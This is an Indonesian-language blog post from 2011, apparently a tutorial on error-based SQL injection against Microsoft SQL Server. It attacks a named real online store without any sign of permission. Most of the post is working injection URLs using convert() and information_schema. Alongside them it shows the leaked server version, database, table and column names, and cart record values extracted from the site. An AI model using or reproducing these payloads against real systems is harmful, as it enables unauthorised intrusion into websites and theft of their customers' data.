Monday, January 10, 2011

Tutorial Hacking Use SQLi/MSSQL




Sebelumnya Saya Mohon Maaf Jaka Para Master" membaca ini, saya cuma ingin Share aja kepada yang belum tahu Caranya hacking Use SQLI/MSSQL.
Ok kita Mulai
Sebagai Contoh saya ada sebuah Website Target:

http://www.bluraydvdonly.com


Ok kita test SQL Injection.

http://www.bluraydvdonly.com/category.asp?catID=20'

Microsoft OLE DB Provider for SQL Server  error '80040e14'

Unclosed quotation mark before the character string '20';'.

/PageData/page.platform.access.asp, line 11

Nah Lo Ternyata MSSQL , ok kita selidiki lebih Lanjut


Kita keluarin pesan error pake perintah convert() untuk dapet version()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,@@version)--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Nah Lo Nongol Versinya
jadi kita memanfaatkan pesan error dari sql server...
karena kita mencoba meng-convert string menjadi integer --> convert(int, inject_here) maka dia akan mengeluarkan pesan error seperti diatas
yuk kita liat liat yg lain lagi.

Check user pake fungsi user_name()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,user_name())--
OR
http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,user)--


Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'dbo' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Check nama database

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name())--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'BluerayDVD' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Nah Kita Bisa liat Tuh Nama Data basenya " BluerayDVD "

Kalau mau liat database yg lainnya??? tinggal kasih index di fungsi db_name(index)

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name(1))--

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name(2))--

dan seterusnya

Nah coba sekarang kita liat isi database yg BluerayDVD.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CentinelProcessing' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Tuh table pertama yg kita dapetin namanya CentinelProcessing..
oya karena db_name() --> BluerayDVD artinya BluerayDVD adalah database yg sekarang sedang terkoneksi... jadi kita gak perlu pake ...Where table_catalog=db_name()...
hasilnya sama sih...

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog=db_name()))--

Klo di mysql biasanya kita pake limit untuk ngeluarin isinya satu persatu..
klo di mssql kita pake --> not in()
coba liat ini,, sama kayak query yg sebelumnya,, cuma ditambah not in()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'Cities' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Tuh kita dapet tabel ke-2nya

select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing'))

Ini klo diterjemahin--> kasih lihat table_name dari tabel `information_schema.tables` dimana table_name bukan CentinelProcessing

lanjut ke table berikutnya,, tadi kan kita dah dapet table ke-2 yaitu Cities

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing','Cities')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'check_sysuser' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Dapet table check_sysuser .. dah terusin tuh sampe kamu dapet semua nama table atau table yg kamu incerrr..
klo dah gak keluar pesan error berarti tablenya ud semuanya

Liat nama2 column pada sebuah table, misal table CentinelProcessing

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing'))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'DataKey' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Klo kamu perhatiin kita disini memanfaatkan table2 pada information_schema untuk mendapatkan nama table dan column,, mirip2 kayak injection di mysql versi 5..



Untuk dapetin nama column berikutnya,, sama kyk ngedapetin nama table yaitu pake not in()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing' and column_name not in('DataKey')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CartID' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Dapet column kedua pada tabel CentinelProcessing --> CartID


Next coluuuuumn...

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing' and column_name not in('DataKey','CartID')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CID' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Truzz sampe gak kluar error brarti dah dapet semuanya...
sekarang kita udah dapet nama table dan column-columnnya, kita bisa lanjut liat isinya...



Mari kita liat isi 'CartID' pada table CentinelProcessing

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing))--
Syntax error converting the varchar value 'CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5' to a column of data type int.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing where CartID not in('CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5')))--
Syntax error converting the varchar value 'CSR@C63CNXD3BQN78V9DJCW3426MQVHPPZ35YHRMBXZEX1B8W5' to a column of data type int.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing where CartID not in('CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5','CSR@C63CNXD3BQN78V9DJCW​3426MQVHPPZ35YHRMBXZEX1B8W5')))--
Syntax error converting the varchar value 'CSR@64VB3W6E22SJ2IQZNZPSB2ZV87M2JNKSU4KKRXUFP2HTPJ' to a column of data type int.

dan seterusnya...

Sekian DUlu Dari Saya, Semoga Ini bermanfaat Buat yang Ingin belajar.

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Radio Online